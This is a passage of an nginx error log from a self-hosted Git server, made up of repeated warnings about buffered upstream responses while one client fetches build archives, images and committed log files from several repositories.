"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" -2026/02/17 15:39:15 [warn] 921#921: *60316 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/34/0000014348 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" -2026/02/17 15:42:08 [warn] 921#921: *61318 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/34/0000014349 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" -2026/02/17 15:45:08 [warn] 921#921: *61318 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/35/0000014350 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" -2026/02/17 15:50:28 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/35/0000014351 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -2026/02/17 15:50:57 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/35/0000014352 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -2026/02/17 15:51:38 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/35/0000014353 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -2026/02/17 15:51:43 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/35/0000014354 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -2026/02/17 15:52:16 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/35/0000014355 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -2026/02/17 15:52:23 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/35/0000014356 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -2026/02/17 15:52:55 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/35/0000014357 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -2026/02/17 15:53:13 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/35/0000014358 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" -2026/02/17 15:53:21 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/35/0000014359 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" -2026/02/17 16:01:19 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/36/0000014360 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -2026/02/17 16:01:37 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/36/0000014361 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -2026/02/17 16:01:53 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/36/0000014362 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -2026/02/17 16:02:00 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/36/0000014363 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -2026/02/17 16:02:40 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/36/0000014364 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -2026/02/17 16:03:18 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/36/0000014365 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -2026/02/17 16:03:24 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/36/0000014366 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -2026/02/17 16:03:28 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/36/0000014367 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -2026/02/17 16:04:01 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/36/0000014368 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -2026/02/17 16:04:08 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/36/0000014369 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -2026/02/17 16:04:27 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/37/0000014370 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -2026/02/17 16:04:30 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/37/0000014371 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -2026/02/17 16:04:31 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/37/0000014372 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -2026/02/17 16:04:43 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/37/0000014373 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -2026/02/17 16:04:48 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/37/0000014374 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -2026/02/17 16:04:51 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/37/0000014375 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -2026/02/17 16:05:02 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/37/0000014376 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -2026/02/17 16:05:05 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/37/0000014377 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -2026/02/17 16:14:20 [warn] 921#921: *65830 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/12/0000015121 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -2026/02/17 16:14:34 [warn] 921#921: *65830 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/12/0000015122 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" -2026/02/17 16:14:48 [warn] 921#921: *65830 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/12/0000015123 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" -2026/02/17 16:14:51 [warn] 921#921: *65830 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/12/0000015124 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" -2026/02/17 16:24:20 [warn] 921#921: *66833 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/12/0000015125 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" -2026/02/17 16:29:45 [warn] 921#921: *67836 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/12/0000015126 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/assetpilot.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/assetpilot.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" -2026/02/17 16:40:29 [warn] 919#919: *68852 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/12/0000015127 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" -2026/02/17 16:41:41 [warn] 919#919: *68852 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/12/0000015128 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -2026/02/17 16:43:54 [warn] 919#919: *68852 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/12/0000015129 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" -2026/02/17 16:46:32 [warn] 919#919: *69854 an upstream response is buffered to a temporary file 